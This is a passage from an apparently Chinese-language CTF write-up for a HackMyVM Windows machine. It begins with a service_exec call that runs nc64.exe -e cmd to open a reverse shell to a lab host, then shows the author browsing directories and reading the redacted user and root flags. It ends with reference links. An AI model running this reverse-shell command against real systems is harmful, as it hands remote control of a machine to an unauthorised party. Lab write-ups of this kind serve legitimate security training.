service_exec(conn, r'cmd /c c:\\windows\\temp\\nc64.exe -e cmd 192.168.10.104 1234')

成功！

但是pwncat-cs又不行了。。。。。

换一个：

查找flag

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E4E7-1761

 Directory of C:\

07/16/2016  06:18 AM    <DIR>          PerfLogs
04/15/2024  07:04 AM    <DIR>          Program Files
01/06/2017  08:09 PM    <DIR>          Program Files (x86)
04/15/2024  07:34 AM    <DIR>          Users
08/10/2024  08:11 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  21,073,338,368 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E4E7-1761

 Directory of C:\Users

04/15/2024  07:34 AM    <DIR>          .
04/15/2024  07:34 AM    <DIR>          ..
04/15/2024  07:04 AM    <DIR>          Administrator
04/15/2024  07:04 AM    <DIR>          Public
04/15/2024  07:34 AM    <DIR>          ruycr4ft
               0 File(s)              0 bytes
               5 Dir(s)  21,073,338,368 bytes free

C:\Users>dir /s *.txt
dir /s *.txt
 Volume in drive C has no label.
 Volume Serial Number is E4E7-1761

 Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline

04/15/2024  07:35 AM               307 ConsoleHost_history.txt
               1 File(s)            307 bytes

 Directory of C:\Users\Administrator\Desktop

04/15/2024  07:32 AM                76 root.txt
               1 File(s)             76 bytes

 Directory of C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support

08/10/2024  02:45 PM             3,767 NisLog.txt
               1 File(s)          3,767 bytes

 Directory of C:\Users\ruycr4ft\Desktop

04/15/2024  07:34 AM                58 user.txt
               1 File(s)             58 bytes

     Total Files Listed:
               4 File(s)          4,208 bytes
               0 Dir(s)  21,073,338,368 bytes free

C:\Users>type C:\Users\ruycr4ft\Desktop\user.txt
type C:\Users\ruycr4ft\Desktop\user.txt
HMV{XXXXXXXXXXXXXXXX}

C:\Users>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
HMV{XXXXXXXXXXXXXXXX}

参考

https://youtube.com/watch?v=9f_SOPJVFig

https://blog.zgsec.cn/archives/172.html?scroll=comment-160

https://blog.csdn.net/yyyyyybw/article/details/132741112?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-132741112-blog-120579915.235^v43^pc_blog_bottom_relevance_base5&spm=1001.2101.3001.4242.1&utm_relevant_index=3

https://www.cnblogs.com/backlion/p/7325228.html